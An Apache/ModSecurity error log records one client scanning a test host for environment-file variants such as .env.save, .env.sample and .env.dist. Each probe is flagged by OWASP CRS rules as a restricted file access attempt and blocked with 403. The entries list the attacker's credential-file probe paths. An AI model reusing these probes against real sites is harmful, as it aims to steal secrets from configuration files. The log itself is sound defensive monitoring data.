[Fri Jan 16 03:14:10.028146 2026] [:error] [pid 1444040] [client 45.148.10.246:46942] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWme8vn_5sIyKhJ5GAzXsQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.save
[Fri Jan 16 03:14:10.238002 2026] [:error] [pid 1444031] [client 45.148.10.246:46944] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.saved"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8n-9MmrgwjmYTAJQbgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved
[Fri Jan 16 03:14:10.238230 2026] [:error] [pid 1444031] [client 45.148.10.246:46944] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8n-9MmrgwjmYTAJQbgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved
[Fri Jan 16 03:14:10.238402 2026] [:error] [pid 1444031] [client 45.148.10.246:46944] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8n-9MmrgwjmYTAJQbgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved
[Fri Jan 16 03:14:10.416096 2026] [:error] [pid 1444033] [client 45.148.10.246:46946] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.saved/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved/"] [unique_id "aWme8tLJkp65ULFQ2YYglgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved/
[Fri Jan 16 03:14:10.416325 2026] [:error] [pid 1444033] [client 45.148.10.246:46946] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved/"] [unique_id "aWme8tLJkp65ULFQ2YYglgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved/
[Fri Jan 16 03:14:10.416482 2026] [:error] [pid 1444033] [client 45.148.10.246:46946] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved/"] [unique_id "aWme8tLJkp65ULFQ2YYglgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.saved/
[Fri Jan 16 03:14:10.572853 2026] [:error] [pid 1444034] [client 45.148.10.246:46962] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.saved"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8uRfEYyDES-ZFL4giwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.saved
[Fri Jan 16 03:14:10.573095 2026] [:error] [pid 1444034] [client 45.148.10.246:46962] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8uRfEYyDES-ZFL4giwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.saved
[Fri Jan 16 03:14:10.573257 2026] [:error] [pid 1444034] [client 45.148.10.246:46962] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8uRfEYyDES-ZFL4giwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.saved
[Fri Jan 16 03:14:10.728124 2026] [:error] [pid 1444032] [client 45.148.10.246:46968] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.saved"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8ukMvq8uPO2ZciWoigAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.saved
[Fri Jan 16 03:14:10.728348 2026] [:error] [pid 1444032] [client 45.148.10.246:46968] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8ukMvq8uPO2ZciWoigAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.saved
[Fri Jan 16 03:14:10.728497 2026] [:error] [pid 1444032] [client 45.148.10.246:46968] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.saved"] [unique_id "aWme8ukMvq8uPO2ZciWoigAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.saved
[Fri Jan 16 03:14:10.898179 2026] [:error] [pid 1444226] [client 45.148.10.246:46972] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme8mcpoCUgeFICb0bc2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample
[Fri Jan 16 03:14:10.899652 2026] [:error] [pid 1444226] [client 45.148.10.246:46972] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme8mcpoCUgeFICb0bc2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample
[Fri Jan 16 03:14:10.899839 2026] [:error] [pid 1444226] [client 45.148.10.246:46972] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme8mcpoCUgeFICb0bc2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample
[Fri Jan 16 03:14:11.060563 2026] [:error] [pid 1444040] [client 45.148.10.246:46984] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample/"] [unique_id "aWme8_n_5sIyKhJ5GAzXsgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample/
[Fri Jan 16 03:14:11.060791 2026] [:error] [pid 1444040] [client 45.148.10.246:46984] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample/"] [unique_id "aWme8_n_5sIyKhJ5GAzXsgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample/
[Fri Jan 16 03:14:11.060954 2026] [:error] [pid 1444040] [client 45.148.10.246:46984] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample/"] [unique_id "aWme8_n_5sIyKhJ5GAzXsgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.sample/
[Fri Jan 16 03:14:11.184175 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme83-9MmrgwjmYTAJQbwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.sample
[Fri Jan 16 03:14:11.184404 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme83-9MmrgwjmYTAJQbwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.sample
[Fri Jan 16 03:14:11.184577 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme83-9MmrgwjmYTAJQbwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.sample
[Fri Jan 16 03:14:11.307437 2026] [:error] [pid 1444033] [client 45.148.10.246:46992] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme89LJkp65ULFQ2YYglwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.sample
[Fri Jan 16 03:14:11.307659 2026] [:error] [pid 1444033] [client 45.148.10.246:46992] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme89LJkp65ULFQ2YYglwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.sample
[Fri Jan 16 03:14:11.307824 2026] [:error] [pid 1444033] [client 45.148.10.246:46992] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWme89LJkp65ULFQ2YYglwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.sample
[Fri Jan 16 03:14:11.486061 2026] [:error] [pid 1444034] [client 45.148.10.246:47004] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aWme8-RfEYyDES-ZFL4gjAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Fri Jan 16 03:14:11.486288 2026] [:error] [pid 1444034] [client 45.148.10.246:47004] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aWme8-RfEYyDES-ZFL4gjAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Fri Jan 16 03:14:11.486462 2026] [:error] [pid 1444034] [client 45.148.10.246:47004] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aWme8-RfEYyDES-ZFL4gjAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Fri Jan 16 03:14:11.668678 2026] [:error] [pid 1444032] [client 45.148.10.246:47006] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example/"] [unique_id "aWme8-kMvq8uPO2ZciWoiwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.example/
[Fri Jan 16 03:14:11.668921 2026] [:error] [pid 1444032] [client 45.148.10.246:47006] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example/"] [unique_id "aWme8-kMvq8uPO2ZciWoiwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.example/
[Fri Jan 16 03:14:11.669087 2026] [:error] [pid 1444032] [client 45.148.10.246:47006] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example/"] [unique_id "aWme8-kMvq8uPO2ZciWoiwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.example/
[Fri Jan 16 03:14:12.494222 2026] [:error] [pid 1444031] [client 45.148.10.246:47020] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist/"] [unique_id "aWme9H-9MmrgwjmYTAJQcAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dist/
[Fri Jan 16 03:14:12.494476 2026] [:error] [pid 1444031] [client 45.148.10.246:47020] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist/"] [unique_id "aWme9H-9MmrgwjmYTAJQcAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dist/
[Fri Jan 16 03:14:12.494632 2026] [:error] [pid 1444031] [client 45.148.10.246:47020] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist/"] [unique_id "aWme9H-9MmrgwjmYTAJQcAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dist/
[Fri Jan 16 03:14:12.678926 2026] [:error] [pid 1444033] [client 45.148.10.246:47022] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9NLJkp65ULFQ2YYgmAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.dist
[Fri Jan 16 03:14:12.679149 2026] [:error] [pid 1444033] [client 45.148.10.246:47022] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9NLJkp65ULFQ2YYgmAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.dist
[Fri Jan 16 03:14:12.679325 2026] [:error] [pid 1444033] [client 45.148.10.246:47022] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9NLJkp65ULFQ2YYgmAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.dist
